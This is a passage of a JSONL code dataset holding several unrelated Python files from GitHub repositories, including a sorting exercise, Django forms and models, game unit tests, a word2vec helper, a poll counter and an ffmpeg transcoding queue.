list(filter(lambda track: track['id'] not in ids_in_setlist, options))\n\ndef replace_pound_track(setlist, replace_track_num, new_track_id):\n \"\"\" Replaces given track with given new track in setlist \"\"\"\n \n # get new track based on id\n new_track = _find_track_by_id(new_track_id)\n\n track_index = int(replace_track_num) - 1\n old_track = setlist[track_index]\n track_type = old_track['type']\n track_level = old_track['level']\n is_arm_track = old_track['isArmTrack']\n\n insert = {}\n insert['type'] = track_type\n insert['level'] = track_level\n insert['name'] = new_track['name']\n insert['artist'] = new_track['artist']\n insert['isArmTrack'] = is_arm_track\n insert['id'] = new_track['id']\n\n setlist[track_index] = insert\n return setlist\n\ndef _find_track_by_id(track_id):\n \"\"\" Transforms track with given id from JSON file text to JSON object \"\"\"\n with open(POUND_TRACK_LIST_LOCATION, 'r', encoding='UTF-8') as pound_track_list_file:\n data = pound_track_list_file.read()\n pound_track_list_file.close()\n\n data_json = json.loads(data)\n track = []\n for type_entry in data_json:\n curr_data = data_json[type_entry]\n if isinstance(curr_data, dict):\n for level_entry in data_json[type_entry]:\n curr_data = data_json[type_entry][level_entry]\n track = list(filter(lambda t: t['id'] == int(track_id), curr_data))\n if len(track) > 1:\n raise DuplicateIDError('There is more than one track with the ID ' + track_id + ' found in the POUND track list.')\n if len(track) == 1:\n return track[0]\n if isinstance(curr_data, list):\n track = list(filter(lambda t: t['id'] == int(track_id), curr_data))\n if len(track) > 1:\n raise DuplicateIDError('There is more than one track with the ID ' + track_id + ' found in the POUND track list.')\n if len(track) == 1:\n return track[0]\n if len(track) == 0:\n raise TrackNotFoundError('There is no track with ID ' + track_id + ' found in the POUND track list.')\n return track[0]","repo_name":"sierra-acy/pound-setlist-generator","sub_path":"setlist-generator/api/pound.py","file_name":"pound.py","file_ext":"py","file_size_in_byte":6271,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"91"}
+{"seq_id":"16075950943","text":"def insertionSort(theSeq):\n n = len(theSeq)\n for i in range(1, n):\n value = theSeq[i]\n pos = i\n while pos > 0 and value < theSeq[pos - 1]:\n theSeq[pos] = theSeq[pos - 1]\n pos -= 1\n theSeq[pos] = value\n\nl = []\nx = int(input(\"Enter The Number Of Elements: \"))\nprint(\"Enter The Elements: \")\nfor i in range(x):\n a = int(input())\n l.append(a)\n\ninsertionSort(l)\nprint(\"\\nSorted List: \", l)","repo_name":"mihir-28/Data-Structure","sub_path":"insertionsort.py","file_name":"insertionsort.py","file_ext":"py","file_size_in_byte":445,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"2637778715","text":"import unittest\n\nfrom src.constants import TILE_SIZE\nfrom src.game_entities.destroyable import DamageKind\nfrom src.game_entities.foe import Keyword\nfrom src.game_entities.weapon import Weapon\nfrom tests.random_data_library import (\n random_weapon,\n random_foe_entity,\n random_player_entity,\n)\nfrom tests.tools import minimal_setup_for_game\n\n\nclass TestWeapon(unittest.TestCase):\n @classmethod\n def setUpClass(cls):\n minimal_setup_for_game()\n\n def test_init_weapon(self):\n name = \"short_sword\"\n sprite = \"imgs/dungeon_crawl/item/weapon/short_sword_2_old.png\"\n description = \"A basic little sword, but one that can already prove very useful\"\n price = 500\n equipped_sprite = [\"imgs/dungeon_crawl/player/hand_right/short_sword.png\"]\n durability = 40\n reach = [1]\n power = 4\n kind = \"PHYSICAL\"\n weight = 2\n restrictions = []\n possible_effects = []\n strong_against = [Keyword.LARGE]\n sword = Weapon(\n name,\n sprite,\n description,\n price,\n equipped_sprite,\n power,\n kind,\n weight,\n durability,\n reach,\n restrictions,\n possible_effects,\n strong_against,\n )\n self.assertEqual(name, sword.name)\n self.assertEqual(description, sword.description)\n self.assertEqual(\"Short Sword\", str(sword))\n self.assertEqual(price, sword.price)\n self.assertEqual(price // 2, sword.resell_price)\n self.assertEqual(durability, sword.durability_max)\n self.assertEqual(durability, sword.durability)\n self.assertEqual(reach, sword.reach)\n self.assertEqual(power, sword.attack)\n self.assertEqual(DamageKind[kind], sword.attack_kind)\n self.assertEqual(weight, sword.weight)\n self.assertEqual(restrictions, sword.restrictions)\n self.assertEqual(possible_effects, sword.effects)\n self.assertEqual(strong_against, sword.strong_against)\n\n def test_decreasing_durability(self):\n durability = 40\n weapon = random_weapon(durability=durability)\n self.assertEqual(durability, weapon.durability)\n self.assertEqual(durability, weapon.durability_max)\n\n for i in range(durability):\n current_durability = weapon.durability\n weapon.used()\n self.assertEqual(current_durability - 1, weapon.durability)\n\n self.assertEqual(0, weapon.durability)\n\n def test_resell_price_following_durability(self):\n price = 500\n durability = 40\n weapon = random_weapon(price=price, durability=durability)\n self.assertEqual(price // 2, weapon.resell_price)\n self.assertEqual(durability, weapon.durability)\n self.assertEqual(durability, weapon.durability_max)\n\n for i in range(durability):\n before_use_price = weapon.resell_price\n weapon.used()\n self.assertTrue(weapon.resell_price < before_use_price)\n\n self.assertEqual(0, weapon.resell_price)\n\n def test_hit_power(self):\n power = 3\n strong_against = []\n weapon = random_weapon(atk=power, strong_against=strong_against)\n self.assertEqual(power, weapon.hit(random_player_entity(), random_foe_entity()))\n\n def test_stronger_against_specific_entity_kind(self):\n power = 5\n strong_against = [Keyword.LARGE]\n weapon = random_weapon(atk=power, strong_against=strong_against)\n\n normal_foe = random_foe_entity(keywords=[])\n self.assertEqual(power, weapon.hit(random_player_entity(), normal_foe))\n\n vulnerable_foe = random_foe_entity(keywords=[Keyword.LARGE])\n self.assertEqual(power * 2, weapon.hit(random_player_entity(), vulnerable_foe))\n\n def test_stronger_against_multiple_entity_kinds(self):\n power = 4\n strong_against = [Keyword.LARGE, Keyword.CAVALRY]\n weapon = random_weapon(atk=power, strong_against=strong_against)\n\n non_vulnerable_foe = random_foe_entity(keywords=[Keyword.SMALL])\n self.assertEqual(power, weapon.hit(random_player_entity(), non_vulnerable_foe))\n\n vulnerable_foe = random_foe_entity(keywords=[Keyword.LARGE])\n self.assertEqual(power * 2, weapon.hit(random_player_entity(), vulnerable_foe))\n\n super_vulnerable_foe = random_foe_entity(\n keywords=[Keyword.CAVALRY, Keyword.LARGE]\n )\n self.assertEqual(\n power * 3, weapon.hit(random_player_entity(), super_vulnerable_foe)\n )\n\n def test_charge_bonus(self):\n power = 4\n spear = random_weapon(atk=power, attack_kind=\"PHYSICAL\", charge=True)\n player = random_player_entity()\n player.strength = 5\n attacked_ent = random_foe_entity(\n min_hp=1000, max_hp=1000, max_defense=0, keywords=[]\n )\n player.equip(spear)\n # No charge\n self.assertEqual(player.strength + spear.attack, player.attack(attacked_ent))\n\n # Charge\n player.position = (\n player.old_position[0] + 5 * TILE_SIZE,\n player.old_position[1],\n )\n self.assertEqual(\n player.strength + int(spear.attack * 1.5), player.attack(attacked_ent)\n )\n\n # Stronger charge\n player.position = (\n player.old_position[0] + 8 * TILE_SIZE,\n player.old_position[1],\n )\n self.assertEqual(\n player.strength + int(spear.attack * 2), player.attack(attacked_ent)\n )\n\n def test_no_charge_bonus_for_weapon_with_no_charge(self):\n power = 4\n weapon = random_weapon(atk=power, attack_kind=\"PHYSICAL\", charge=False)\n player = random_player_entity()\n player.strength = 5\n attacked_ent = random_foe_entity(\n min_hp=1000, max_hp=1000, max_defense=0, keywords=[]\n )\n player.equip(weapon)\n\n # No charge bonus even if there is a \" charge \"\n player.position = (\n player.old_position[0] + 5 * TILE_SIZE,\n player.old_position[1],\n )\n self.assertEqual(player.strength + weapon.attack, player.attack(attacked_ent))\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"Grimmys/rpg_tactical_fantasy_game","sub_path":"tests/test_weapon.py","file_name":"test_weapon.py","file_ext":"py","file_size_in_byte":6270,"program_lang":"python","lang":"en","doc_type":"code","stars":319,"dataset":"github-code","pt":"91"}
+{"seq_id":"9743295513","text":"import gym\nimport time\nimport random\n\nimport numpy as np\n\nenv = gym.make(\"MountainCar-v0\")\n\nprint(env.action_space.n)\n\nprint(env.reset()) # print the current state of the agent in the environment\n\nprint(env.observation_space.high)\nprint(env.observation_space.low)\n\nDISCRETE_OS_SIZE = [20, 20] # split our observation space for 20 parts\ndiscrete_os_win_size = (env.observation_space.high - env.observation_space.low)/DISCRETE_OS_SIZE # the size of one bucket of os\n\nprint(discrete_os_win_size)\n\nq_table = np.random.uniform(low=-2, high=0, size=DISCRETE_OS_SIZE + [env.action_space.n])\n\nprint(len(q_table))\nprint(q_table)\n\ncounter1 = 0\nfor row in q_table:\n for cell in row:\n print(cell)\n counter1 +=1\n\nprint('counter cell: ', counter1)\n\ndone = False\ncounter = 0\nwhile not done:\n counter += 1\n print(counter)\n #time.sleep(0.01)\n #time.sleep(random.randint(0, 8)*0.01)\n action = random.randint(0,2)\n new_state, reward, done, _ = env.step(action)\n #print(env.step(action))\n print('new_state : ', new_state, 'reward: ', reward, 'done: ', done, _)\n env.render()\n\n\n\n","repo_name":"jonndoe/MountainCar-v0","sub_path":"scrap/main3.py","file_name":"main3.py","file_ext":"py","file_size_in_byte":1102,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"12271032029","text":"from PyQt5 import QtWidgets\nfrom addres import * # импорт нашего сгенерированного файла\nimport sys\nfrom BD import Orm\n\n\nclass AddResponsible(QtWidgets.QDialog):\n def __init__(self):\n super(AddResponsible, self).__init__()\n self.ui = Ui_Dialog()\n self.ui.setupUi(self)\n self.ui.buttonBox.accepted.connect(self.add)\n self.ui.buttonBox.rejected.connect(self.close)\n\n self.bd = Orm()\n\n def add(self):\n name = self.ui.lineEdit.text() # имя\n family = self.ui.lineEdit_2.text() # фамилия\n patronymic =self.ui.lineEdit_3.text() # отчество\n position = self.ui.lineEdit_4.text() # должность\n\n self.bd.addres(name, family, patronymic, position)\n self.close()\n\n","repo_name":"Vorlogg/Material-Accounting","sub_path":"AddRespons.py","file_name":"AddRespons.py","file_ext":"py","file_size_in_byte":803,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"18783379372","text":"#!/usr/bin/env python\n#==============================================================================\n#author\t\t\t:Miryam de Lhoneux\n#email\t\t\t:miryam.de_lhoneux@lingfil.uu.se\n#date\t\t\t:2015/12/30\n#version\t\t:1.0\n#Python version :2.7.6\n#==============================================================================\n\nimport config\nimport src.utils\nclass UDtreebank():\n def __init__(self,language,location = config.data):\n self._language = language\n self._location = location\n iso_dic = src.utils.iso_code\n files_prefix = self._location + language + \"/\" + iso_dic[self._language]\n self.trainfile = files_prefix + \"-ud-train.conllu\"\n self.devfile = files_prefix + \"-ud-dev.conllu\"\n self.testfile = files_prefix + \"-ud-test.conllu\"\n","repo_name":"mdelhoneux/oDETTE","sub_path":"odette/src/UD_treebank.py","file_name":"UD_treebank.py","file_ext":"py","file_size_in_byte":776,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"91"}
+{"seq_id":"70978783022","text":"\"\"\"\nBooking App - Forms\n----------------\nForms for Booking App\n\n\"\"\"\n\nfrom django import forms\nfrom datetime import date\nfrom .models import Booking, Table\nfrom django.contrib import messages\n\n\nclass BookingForm(forms.Form):\n \"\"\"\n Form for the Booking Model\n \"\"\"\n\n date = forms.DateField(widget=forms.DateInput(attrs={\n 'id': 'datePicker', 'class': 'form-control', 'type': 'date'}),\n label='', error_messages={\n 'required': \"Please Enter your Name\"\n })\n start_time = forms.TimeField(widget=forms.TimeInput(attrs={\n 'id': 'startTime', 'class': 'form-control', 'type': 'time',\n 'step': '3600'}), label='')\n end_time = forms.TimeField(widget=forms.TimeInput(\n attrs={'id': 'endTime', 'class': 'form-control',\n 'type': 'time', 'step': '3600'}), label='')\n table_code = forms.ChoiceField(widget=forms.Select(\n attrs={'id': 'tableCode', 'class': 'form-control'}),\n choices=(\n (\"A1\", \"A1\"), (\"A2\", \"A2\"), (\"B1\", \"B1\"),\n (\"B2\", \"B2\"), (\"C1\", \"C1\"), (\"C2\", \"C2\")))\n customer_full_name = forms.CharField(widget=forms.TextInput(\n attrs={'id': 'fullName', 'class': 'form-control',\n 'type': 'text', }), required=False)\n customer_email = forms.EmailField(widget=forms.EmailInput(\n attrs={'id': 'email', 'class': 'form-control',\n 'type': 'email'}), required=False)\n book_on_user = forms.BooleanField(widget=forms.CheckboxInput(\n attrs={'id': 'bookAuthenticate',\n 'type': 'checkbox'}), required=False)\n\n def clean(self):\n cleaned_data = super().clean()\n customer_full_name = cleaned_data['customer_full_name']\n customer_email = cleaned_data['customer_email']\n book_on_user = cleaned_data['book_on_user']\n # table_obj = Table.objects.get(code=cleaned_data['table_code'])\n\n if (not (customer_email and customer_full_name) and not book_on_user):\n raise forms.ValidationError(\"Either write name and email or book \"\n + \"on your name by selecting checkbox\")\n\n # if Booking.objects.filter(table=table_obj).exists():\n # raise forms.ValidationError\n # (\"Table is occupied try selecting different table\")\n return cleaned_data\n","repo_name":"Dhvani-intwala/spice-villa","sub_path":"booking/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":2302,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"3958200266","text":"# import pandas as pd\n# import main\nimport numpy as np\nfrom statistics import mean\n\ndata_load = np.zeros(360 * 1440).reshape(360, 1440)\ndata = data_load.T[::4]\ndata = data_load.T[4::4]\n\nstep_y = None\nstep_x = None\n\n\ndef open_file(filepath, flag):\n global data_load # Использование глобальной переменной\n global data # Использование глобальной переменной\n data_load = np.genfromtxt(filepath, delimiter=',')[1::] # Считывание файла\n data = data_load.T[::4] # Выборка для датасета по градусам долготы\n data = data.T[4::4] # Выборка для датасета по градусам широты\n # print(flag)\n if flag == 1: # Если нажата кнопка\n return data # Возврат не полного датасета\n else: # Иначе\n return data_load # Возврат полного датасета\n\n\ndef add_file(filepath, flag):\n global data_load # Использование глобальной переменной\n global data # Использование глобальной переменной\n add_data_load = np.genfromtxt(filepath, delimiter=',')[1::] # Считывание файла\n add_data = add_data_load.T[::4] # Выборка для датасета по градусам долготы\n add_data = add_data.T[4::4] # Выборка для датасета по градусам широты\n if flag == 1: # Если нажата кнопка\n for i in range(len(add_data)):\n for j in range(len(add_data.T)):\n data[i, j] = mean([add_data[i, j], data[i, j]]) # Усреднение значений\n return data # Возврат не полного датасета\n else:\n for i in range(len(add_data_load)):\n for j in range(len(add_data_load.T)):\n data_load[i, j] = mean([add_data_load[i, j], data_load[i, j]]) # Усреднение значений\n return data_load # Возврат полного датасета\n\n\ndef calculate_laplasian(flag):\n global data_load # Использование глобальной переменной\n global data # Использование глобальной переменной\n if flag == 1: # Проверка на возврат датасета по градусам\n calculate_data = data.T[::step_x] # Выборка по шагам для датасета по градусам долготы\n calculate_data = calculate_data.T[::step_y] # Выборка по шагам для датасета по градусам широты\n else:\n calculate_data = data_load.T[::step_x] # Выборка по шагам для датасета по градусам долготы\n calculate_data = calculate_data.T[::step_y] # Выборка по шагам для датасета по градусам широты\n y_len, x_len = calculate_data.shape # Запись длины массива по строкам и столбцам\n # Создание нового пустого массива\n data_laplas = np.empty(calculate_data.size, dtype=str).reshape(int(y_len), int(x_len))\n for i in range(y_len):\n for j in range(x_len):\n data_laplas[i, j] = 'X' # Заполнение массива\n\n for i in range(1, y_len - 1): # проход по столбцам, пропуская первые и последние записи\n for j in range(x_len): # проход по строкам\n # расчёт лапласиан, если это последний номер строки\n if j >= x_len - 1:\n sub = (calculate_data[i - 1, j] + calculate_data[i, 0] + calculate_data[i, j - 1]\n + calculate_data[i + 1, j]) - calculate_data[i, j] * 4\n else: # расчёт лапласиан по формуле ([0,1]+[1,2]+[1,0]+[2,1]) - [1,1]*4\n sub = (calculate_data[i - 1, j] + calculate_data[i, j + 1] + calculate_data[i, j - 1]\n + calculate_data[i + 1, j]) - calculate_data[i, j] * 4\n if sub < 0: data_laplas[i, j] = '-' # если меньше нуля, то записываем \"-\"\n if sub > 0: data_laplas[i, j] = '+' # если больше нуля, то \"+\"\n if sub == 0: data_laplas[i, j] = '0' # если значения равны, то \"0\"\n return data_laplas # возвращения нового массива с подсчитанными лапласианами\n","repo_name":"KirillKovardakov/geostatSGU","sub_path":"algorithm.py","file_name":"algorithm.py","file_ext":"py","file_size_in_byte":4682,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"21987021504","text":"from typing import Set, List\n\nimport numpy as np\nimport pandas\nimport torch\nfrom gensim.models import KeyedVectors\nfrom gensim.models.keyedvectors import Word2VecKeyedVectors\n\nfrom utils.log_hepler import logger\nfrom utils.path_helper import ROOT_DIR\n\nPAD_WORD = \"\"\n# Change this value according to the word embedding you use.\n# Check code in get_word_vec()\nPAD_WORD_ID = 3000000\nWORD_EMBEDDING_SIZE = 300\n\n\ndef review2wid(review: str, word_vec: Word2VecKeyedVectors) -> List[int]:\n \"\"\"\n 1. Convert words in review to word idx, which is from pre-trained word embedding model.\n 2. Pad or shorten review to max length.\n \"\"\"\n\n wids = []\n pad_index = word_vec.vocab[PAD_WORD].index\n for word in review.split():\n if word in word_vec:\n wid = word_vec.vocab[word].index\n else:\n # PAD_WORD also used as UNK_WORD\n wid = pad_index\n wids.append(wid)\n\n return wids\n\n\ndef get_word_vec(path='data/GoogleNews-vectors-negative300.bin'):\n \"\"\"\n Read pre-trained word embedding model, and add \"\" to it with zero weight.\n \"\"\"\n\n logger.info(\"loading word2vec model...\")\n path = ROOT_DIR.joinpath(path)\n word_vec = KeyedVectors.load_word2vec_format(path, binary=True)\n\n if PAD_WORD not in word_vec:\n word_vec.add([PAD_WORD], np.zeros([1, 300]))\n logger.info(f\"Add PAD_WORD to word embedding.\")\n\n assert PAD_WORD_ID == word_vec.vocab[PAD_WORD].index, \\\n f\"PAD_WORD_ID should be {word_vec.vocab[PAD_WORD].index} but not {PAD_WORD_ID}.\"\n\n logger.info(\"word2vec model loaded.\")\n return word_vec\n\n\ndef save_embedding_weights(word_vec, out_path=\"data/embedding_weight.pt\"):\n \"\"\"\n Save the weights of pre-trained word embedding model to file.\n Thus we don't need to load it when train our model.\n This helps to save RAM and model init time.\n \"\"\"\n\n weight = torch.Tensor(word_vec.vectors)\n torch.save(weight, ROOT_DIR.joinpath(out_path))\n logger.info(\"Word embedding weight saved.\")\n\n\ndef load_embedding_weights(path=\"data/embedding_weight.pt\"):\n return torch.load(path)\n\n\n# Find the unknowns words in review text.\n# This step is not necessary for model train.\nif __name__ == \"__main__\":\n df = pandas.read_json(ROOT_DIR.joinpath(\"data/reviews.json\"), lines=True)\n word_vec = get_word_vec()\n unknown_words: Set[str] = set()\n for review in df[\"review\"]:\n for word in review.split():\n if word not in word_vec:\n unknown_words.add(word)\n\n logger.warning(f\"{len(unknown_words)} unknown words!\")\n with open(ROOT_DIR.joinpath(\"out/UNKs.txt\"), \"w\", encoding=\"utf-8\") as f:\n for word in unknown_words:\n f.write(f\"{word}\\n\")\n","repo_name":"KindRoach/NARRE-Pytorch","sub_path":"utils/word2vec_helper.py","file_name":"word2vec_helper.py","file_ext":"py","file_size_in_byte":2719,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"91"}
+{"seq_id":"14321570522","text":"import csv \nimport os \n\ntotal_votes = 0\nkhan_votes = 0\ncorrey_votes = 0 \nli_votes = 0 \notooley_votes = 0\n\n\n\n\n\nelection_file = os.path.join(\"../\", \"Hw2.CSV\")\nwith open(election_file, newline= \"\",encoding= \"utf-8\") as csvfile:\n csvreader = csv.reader(csvfile, delimiter = \",\")\n csvheader = next(csvreader)\n\n for row in csvreader:\n total_votes +=1 \n\n if row[2] == \"Khan\": \n khan_votes +=1\n elif row[2] == \"Correy\":\n correy_votes +=1\n elif row[2] == \"Li\": \n li_votes +=1\n elif row[2] == \"O'Tooley\":\n otooley_votes +=1\n\ncandidates = [\"Khan\", \"Correy\", \"Li\",\"O'Tooley\"]\nvotes = [khan_votes, correy_votes,li_votes,otooley_votes]\n\n\ndict_candidates_and_votes = dict(zip(candidates,votes))\nkey = max(dict_candidates_and_votes, key=dict_candidates_and_votes.get)\n\n\nkhan_percent = (khan_votes/total_votes) *100\ncorrey_percent = (correy_votes/total_votes) * 100\nli_percent = (li_votes/total_votes)* 100\notooley_percent = (otooley_votes/total_votes) * 100\n\nprint(f\"Election Results\")\nprint(f\"............................\")\nprint(f\"Total Votes: {total_votes}\")\nprint(f\"............................\")\nprint(f\"Khan: {khan_percent:.3f}% ({khan_votes})\")\nprint(f\"Correy: {correy_percent:.3f}% ({correy_votes})\")\nprint(f\"Li: {li_percent:.3f}% ({li_votes})\")\nprint(f\"O'Tooley: {otooley_percent:.3f}% ({otooley_votes})\")\nprint(f\"............................\")\nprint(f\"Winner: {key}\")\nprint(f\"............................\")\n\n\n\n\nfile = open(\"outputfile.txt\", \"w\")\n\n\nfile.write(f\"Election Results\")\nfile.write(\"\\n\")\nfile.write(f\"............................\")\nfile.write(\"\\n\")\nfile.write(f\"Total Votes: {total_votes}\")\nfile.write(\"\\n\")\nfile.write(f\"............................\")\nfile.write(\"\\n\")\nfile.write(f\"Khan: {khan_percent:.3f}% ({khan_votes})\")\nfile.write(\"\\n\")\nfile.write(f\"Correy: {correy_percent:.3f}% ({correy_votes})\")\nfile.write(\"\\n\")\nfile.write(f\"Li: {li_percent:.3f}% ({li_votes})\")\nfile.write(\"\\n\")\nfile.write(f\"O'Tooley: {otooley_percent:.3f}% ({otooley_votes})\")\nfile.write(\"\\n\")\nfile.write(f\"............................\")\nfile.write(\"\\n\")\nfile.write(f\"Winner: {key}\")\nfile.write(\"\\n\")\nfile.write(f\"............................\")\n","repo_name":"skennedy18/python_hw","sub_path":"PyPoll/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2213,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"29313578057","text":"#%%\nSTATUS_BASE = 1 # ステータス1に対しての価値\nSTATUS_UP = 1.2 # ステータスに対して、重要なステータスの上振れ率\nSTATUS_DOWN = 0.8 # ステータスに対して、重要でないステータスの下振れ率\n# スピード、スタミナ、パワー、根性(いらないのでとりあえず下げてる)、賢さの価値\nSTATUS_ALL = [STATUS_BASE, STATUS_BASE, STATUS_BASE, STATUS_BASE*STATUS_DOWN, STATUS_BASE]\n\nBONDS_PER = 1/4 # 絆ゲージが溜まっていない場合、ゲージ進行度別の価値割合\nBONDS_UP = 1.2 # 友情トレーニングの時の平均ステータス上昇率\nBONDS_BASE = 10 # 友情トレーニングの価値計算の時に使う基礎値\n# 友情トレーニングを行った時の価値計算(1枚、2枚、3枚)\nBONDS_VALUE = [BONDS_UP*BONDS_BASE, BONDS_UP**2*BONDS_BASE, BONDS_BASE**3*BONDS_UP]\n# 上記の価値に対して、ゲージ進行度に関数る割合をかけて絆ゲージをあげる価値と定める\n\nPHYSICAL_PER = 2/3 # 体力に対する価値(p計算法からそのまま引用)\nSKILL_PER = 2/5 # スキルに対する価値(p計算法からそのまま引用)\n\nTIPS_STATUS_UP_PER = 0.3 # ヒントで得られるステータスorスキルでの割合\nTIPS_SKILL_PER = 0.7\nTIPS_STATUS_VALUE = (6+2)*TIPS_STATUS_UP_PER # ヒントでもらえるステータス価値\nTIPS_SKILL_VALUE_USE = 10*TIPS_SKILL_PER # ヒントで得られるスキルが欲しいものかどうか(確率無視)\nTIPS_SKILL_VALUE_NO = 3*TIPS_SKILL_PER\nTIPS_BONDS_PER = 5/7 # ヒントによる絆ゲージアップの恩恵(5ポイントUPするのでその割合)\nTIPS_BONDS_VALUE = BONDS_VALUE[0]*TIPS_BONDS_PER # ヒントによる絆ゲージアップの価値\nTIPS_USE_VALUE = TIPS_STATUS_VALUE+TIPS_SKILL_VALUE_USE # 使えるスキルのヒント価値\nTIPS_NO_VALUE = TIPS_STATUS_VALUE+TIPS_SKILL_VALUE_NO # 使えないスキルのヒント価値\n# この価値に対して、絆ゲージの価値を現状の割合(BONDS_PER)でかけた値を足して価値として計算可能\n\nCONDITION_PER = [1.2, 1.1, 1.0, 0.9, 0.8] # 調子ごとのステータス影響率\nCONDITION_BASE = 20 # 調子のベース価値\n# 未来に起こる減少イベントは無視(予測不可)\n# あくまで現在の調子から、お出かけなどをする価値があるのかを計算する\nCONDITION_EVENT = [0.3, 0.7] # お出かけによる2UPと1UPの割合をざっくり\n# 1.2 = 5ターンにつき、1ターン分の利益\n# 1.1 = 10ターンにつき、1ターン分の利益 逆は損失\n# 計算めんどなったので、とりあえず引用しておく\nCONDITION_VALUE = 15\n\n# 機会に関しても計算めんどくさいのでそのまま引用\nOP_MAIN = 40\nOP_SUB = 30\nOP_OTHER = 15\n\n\n\nclass P:\n def __init__(self, s=STATUS_ALL, b=BONDS_VALUE, pp=PHYSICAL_PER, sp=SKILL_PER, tuv=TIPS_USE_VALUE,\n tnv=TIPS_NO_VALUE, cv=CONDITION_VALUE, om=OP_MAIN, os=OP_SUB, oo=OP_OTHER):\n self.status = s\n self.bonds = b\n self.physical_per = pp\n self.skill_per = sp\n self.tips = [tuv, tnv, 0]\n self.condition_v = cv\n self.op = [om, os, oo]\n\n def calc(self, status_up, skill_up=3, op=0, tips=2, condition=0, bonds1=0, bonds2=0, bonds3=0, physical=25):\n '''\n 引数 :\n op : メイン(0)サブ(1)その他(2)を指定\n status_up : ステータスの上昇値(必須)\n tips : 欲しい(0)欲しくない(1)なし(2)\n consdition : 増加があり(1)なし(0)、減少は(-1)\n bonds : 溜めているゲージの数、繰り上げ(0 > 1, 1 > 2, 2 > 3, 3 > 4、4超過は入力なし(0))\n 他は数値\n '''\n b = self.bonds*bonds1 + self.bonds*bonds2 + self.bonds*bonds3\n\n self.result = status_up + physical*self.physical_per + skill_up*self.skill_per + self.tips[tips] \\\n + self.condition_v*condition + self.op[op] + b\n\n return self.result\n# %%\n","repo_name":"sugimochi97/uma_musume","sub_path":"p_calc/p.py","file_name":"p.py","file_ext":"py","file_size_in_byte":4042,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"4711580410","text":"from django.db import models\nfrom django.utils import timezone\nfrom django.utils.translation import ugettext_lazy as _\n\nclass Poster(models.Model):\n\n class Meta(object):\n verbose_name=_(\"Band shows\")\n verbose_name_plural=_(\"Band shows\")\n\n venue = models.CharField(\n max_length=200,\n blank=False,\n null=False,\n verbose_name=_(\"City, Venue\")\n )\n\n show_date = models.DateField(\n blank=False,\n null=False,\n verbose_name=_(\"Date of Show\")\n )\n\n show_info = models.TextField(\n blank=False,\n null=False,\n verbose_name=_(\"Show Info\")\n )\n\n affiche = models.ImageField(\n blank=True,\n verbose_name=_(\"Affiche\"),\n null=True\n )\n\n tickets_link = models.URLField(\n max_length = 400,\n blank=True,\n verbose_name=_(\"Link to buy tickets\")\n )\n\n published_date = models.DateTimeField(\n blank=True,\n null=True,\n verbose_name=_(\"Published, date\")\n )\n\n def publish(self):\n self.save()\n\n def __str__(self):\n return \"%s %s\" %(self.venue, self.show_date)\n","repo_name":"imhub/prklb","sub_path":"shows/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1157,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"2461909290","text":"import asyncio\nfrom functools import partial\nimport os\nimport shutil\nfrom fastapi import BackgroundTasks \nimport ffmpeg\nfrom src.api.controllers.codec_controller import get_all_codecs\nfrom src.api.controllers.episode_controller import get_episode\nfrom src.api.controllers.series_controller import get_series\nfrom src.api.routes.codec_routes import get_all_containers_route\nfrom src.api.routes.profile_routes import get_all_profiles\nfrom src.api.routes.scan_routes import scan_all_series, scan_queue, scan_series, validate_database\nfrom src.api.utils import get_root_folder, get_series_folder, get_transcode_folder\n\nfrom src.models.queue import queue_instance\nfrom watchdog.observers import Observer\nfrom watchdog.events import FileSystemEventHandler\n\nasync def scan_queue_periodic():\n while True:\n await asyncio.sleep(20)\n await scan_queue()\n\nasync def process_episodes_in_queue_periodic():\n while True:\n q = queue_instance.queue\n w = True\n while q and w:\n await asyncio.sleep(5)\n await process_episode(queue_instance.peek())\n await queue_instance.dequeue()\n\n\nasync def process_episode(e):\n if not e:\n return\n episode = await get_episode(e['id'])\n series = await get_series(episode['series_id'])\n profiles = await get_all_profiles()\n profile = profiles[series['profile_id']]\n file_name = os.path.splitext(episode['filename'])[0] # Remove existing extension\n\n preset = profile['speed']\n encoder = profile['encoder']\n output_container = profile['container']\n output_extension = profile['extension']\n\n input_file = os.path.join(await get_series_folder(), series['id'], episode['season_name'], episode['filename'])\n output_file = os.path.join(await get_transcode_folder(), f\"{file_name}.{output_extension}\")\n\n\n probe = ffmpeg.probe(input_file)\n video_stream = next((stream for stream in probe['streams'] if stream['codec_type'] == 'video'), None)\n\n check = video_stream['codec_name']\n if check == profile['codec']:\n return\n loop = asyncio.get_event_loop()\n if encoder == 'mpeg4' or encoder == 'h264': \n await loop.run_in_executor(None, lambda: ffmpeg.input(input_file).output(output_file, vcodec=encoder, f=output_container).run())\n await loop.run_in_executor(None, partial(shutil.move, output_file, input_file))\n else:\n await loop.run_in_executor(None, lambda: ffmpeg.input(input_file).output(output_file, vcodec=encoder, preset=preset, f=output_container).run())\n await loop.run_in_executor(None, partial(shutil.move, output_file, input_file)) \n await asyncio.sleep(20)\n return\n\n\n\n\nclass FileChangeHandler(FileSystemEventHandler):\n def on_modified(self, event):\n print(f'File {event.src_path} has been modified')\n loop = asyncio.new_event_loop()\n asyncio.set_event_loop(loop)\n loop.run_until_complete(asyncio.gather(scan_all_series(), validate_database()))\n\n def on_created(self, event):\n print(f'File {event.src_path} has been created')\n loop = asyncio.new_event_loop()\n asyncio.set_event_loop(loop)\n loop.run_until_complete(asyncio.gather(scan_all_series(), 